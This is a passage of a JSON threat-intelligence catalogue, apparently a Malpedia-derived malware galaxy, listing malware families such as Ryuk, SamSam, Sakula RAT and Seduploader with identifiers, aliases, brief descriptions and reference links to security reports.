"https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/", "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/", "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://twitter.com/IntelAdvanced/status/1353546534676258816", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/", "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://github.com/scythe-io/community-threats/tree/master/Ryuk", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/", "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf", "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", "https://www.secureworks.com/research/threat-profiles/gold-ulrick", "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/", "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP", "https://www.youtube.com/watch?v=CgDtm05qApE", "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/", "https://unit42.paloaltonetworks.com/ryuk-ransomware/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://twitter.com/Prosegur/status/1199732264386596864", "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders", "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.youtube.com/watch?v=BhjQ6zsCVSc", "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456", "https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/", "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://twitter.com/SophosLabs/status/1321844306970251265", "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/", "https://blog.cyberint.com/ryuk-crypto-ransomware", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/", "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/", "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/", "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/", "https://www.youtube.com/watch?v=Of_KjNG9DHc", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/", "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf", "https://twitter.com/IntelAdvanced/status/1356114606780002308", "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/", "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc", "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", "https://www.youtube.com/watch?v=7xxRunBP5XA", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" ], "synonyms": [], "type": [] }, "uuid": "62c79940-184e-4b8d-9237-35434bb79678", "value": "Ryuk" }, { "description": "Information Stealer that searches for sensitive documents and uploads its results to an FTP server. Skips files with known Ryuk extensions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer", "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/", "https://twitter.com/VK_Intel/status/1171782155581689858" ], "synonyms": [], "type": [] }, "uuid": "0f0e5355-1dbf-4af4-aebf-88b08e6272a4", "value": "Ryuk Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo", "https://id-ransomware.blogspot.com/2020/04/sadogo-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "188528f1-1292-4aaa-b1e6-3fe0ab78ff81", "value": "Sadogo Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.saefko", "https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat" ], "synonyms": [], "type": [] }, "uuid": "60124475-1c52-4108-81cf-7b9fa0f0d3bb", "value": "Saefko" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-safe-a-targeted-threat.pdf" ], "synonyms": [], "type": [] }, "uuid": "d16f9dc6-290d-4174-8b47-a972cc52dac7", "value": "SafeNet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", "http://malware-traffic-analysis.net/2017/10/13/index.html", "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", "https://www.cert.pl/en/news/single/sage-2-0-analysis/" ], "synonyms": [ "Saga" ], "type": [] }, "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", "value": "SAGE" }, { "description": "FireEye reports SaiGon as a variant of ISFB v3 (versions documented are tagged 3.50.132) that is more a generic backdoor than being focused on enabling banking fraud.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon", "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/" ], "synonyms": [], "type": [] }, "uuid": "08817c1e-3a90-4c9b-b332-52ebe72669c5", "value": "SaiGon" }, { "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", "https://www.secureworks.com/research/sakula-malware-family", "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99" ], "synonyms": [ "Sakurel" ], "type": [] }, "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", "value": "Sakula RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf", "https://research.checkpoint.com/deobfuscating-apt32-flow-graphs-with-cutter-and-radare2/", "https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware" ], "synonyms": [ "BadCake" ], "type": [] }, "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", "value": "Salgorea" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf", "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf" ], "synonyms": [], "type": [] }, "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", "value": "Sality" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samo_rat", "https://business.xunison.com/analysis-of-samorat/" ], "synonyms": [], "type": [] }, "uuid": "e2db8349-7535-4748-96ac-a18985cf66b8", "value": "SamoRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", "https://www.secureworks.com/research/threat-profiles/gold-lowell", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "http://blog.talosintel.com/2016/03/samsam-ransomware.html", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", "https://www.youtube.com/watch?v=LUxOcpIRxmg", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [ "Samas" ], "type": [] }, "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", "value": "SamSam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", "https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" ], "synonyms": [ "Daws" ], "type": [] }, "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", "value": "Sanny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache", "https://blog.alyac.co.kr/m/2219", "https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails", "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html", "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf", "https://blog.alyac.co.kr/2219" ], "synonyms": [], "type": [] }, "uuid": "056eca1f-4195-48c3-81d8-ed554dd1de20", "value": "SappyCache" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" ], "synonyms": [ "ENDCMD", "Hussarini" ], "type": [] }, "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", "value": "Sarhust" }, { "description": "Sasfis acts mostly as a downloader that has been observed to download Asprox and FakeAV. According to a VirusBulletin article from 2012, it is likely authored by the same group as SmokeLoader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis", "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/", "https://www.symantec.com/security-center/writeup/2010-020210-5440-99", "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/", "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Sasfis-O/detailed-analysis.aspx", "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign" ], "synonyms": [ "Oficla" ], "type": [] }, "uuid": "4c4ceb45-b326-45aa-8f1a-1229e90c78b4", "value": "Sasfis" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", "https://www.sangfor.com/source/blog-network-security/1094.html", "https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html", "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2", "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html", "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/", "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/" ], "synonyms": [ "5ss5c", "DBGer", "Lucky Ransomware" ], "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", "value": "Satan Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", "https://blog.reversinglabs.com/blog/retread-ransomware", "https://www.cylance.com/threat-spotlight-satan-raas" ], "synonyms": [], "type": [] }, "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", "value": "Satana" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla", "https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/" ], "synonyms": [], "type": [] }, "uuid": "957f6c4a-c750-4ba3-820f-5a19d444a57a", "value": "Satellite Turla" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" ], "synonyms": [], "type": [] }, "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", "value": "Sathurbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", "https://securitykitten.github.io/2016/11/15/scanpos.html", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware" ], "synonyms": [], "type": [] }, "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", "value": "ScanPOS" }, { "description": "Ransomware with ransomnote in Russian and encryption extension .scarab.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey", "https://id-ransomware.blogspot.com/2017/12/scarabey-ransomware.html" ], "synonyms": [ "MVP", "Scarab", "Scarab-Russian" ], "type": [] }, "uuid": "76d20f49-9367-4d36-95d2-7ef8ff55568d", "value": "Scarabey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom", "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "http://malware-traffic-analysis.net/2017/11/23/index.html" ], "synonyms": [], "type": [] }, "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", "value": "Scarab Ransomware" }, { "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", "https://github.com/vithakur/schneiken" ], "synonyms": [], "type": [] }, "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", "value": "Schneiken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" ], "synonyms": [], "type": [] }, "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", "value": "Scote" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos", "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf", "https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/" ], "synonyms": [], "type": [] }, "uuid": "b5d90140-f307-402c-9d7f-9cdf21a7cb31", "value": "Scranos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", "https://twitter.com/struppigel/status/791535679905927168" ], "synonyms": [], "type": [] }, "uuid": "9803b201-28e5-40c5-b661-c1a191388072", "value": "ScreenLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot", "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf", "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", "https://github.com/Tera0017/SDBbot-Unpacker", "https://vblocalhost.com/uploads/VB2020-Jung.pdf", "https://www.secureworks.com/research/threat-profiles/gold-tahoe" ], "synonyms": [], "type": [] }, "uuid": "48bbf0b7-d8c3-4ddb-8498-cf8e72b210d8", "value": "SDBbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" ], "synonyms": [ "SeaDuke", "Seadask" ], "type": [] }, "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", "value": "SEADADDY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", "value": "SeaSalt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat", "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers", "https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html" ], "synonyms": [ "1xxbot", "ArechClient" ], "type": [] }, "uuid": "a7e3b468-399c-419c-87d5-4efcea8ec0cc", "value": "SectopRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", "https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" ], "synonyms": [], "type": [] }, "uuid": "272268bb-2715-476b-a121-49142581c559", "value": "SeDll" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/" ], "synonyms": [ "azzy", "eviltoss" ], "type": [] }, "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", "value": "Sedreco" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/", "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", "https://www.secureworks.com/research/threat-profiles/iron-twilight", "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed" ], "synonyms": [ "carberplike", "downrage", "jhuhugit", "jkeyskw" ], "type": [] }, "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", "value": "Seduploader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seinup", "https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-asean.html" ], "synonyms": [], "type": [] }, "uuid": "9789dfe8-d156-4f19-8177-25718dd14f1f", "value": "seinup" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet", "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html", "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] }, "uuid": "b4b4e8c8-fc66-4618-ba35-75f21d7d6922", "value": "Sekhmet Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe", "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" ], "synonyms": [], "type": [] }, "uuid": "503ca41c-7788-477c-869b-ac530f20c490", "value": "SendSafe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys", "https://id-ransomware.blogspot.com/2020/02/sepsys-ransomware.html" ], "synonyms": [ "Silvertor Ransomware" ], "type": [] }, "uuid": "08f37434-4aba-439f-afae-fed61f411ac4", "value": "SepSys Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher", "https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic", "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global" ], "synonyms": [], "type": [] }, "uuid": "6025475a-b89d-401d-882d-50fe1b03154f", "value": "Sepulcher" }, { "description": "", "meta": { 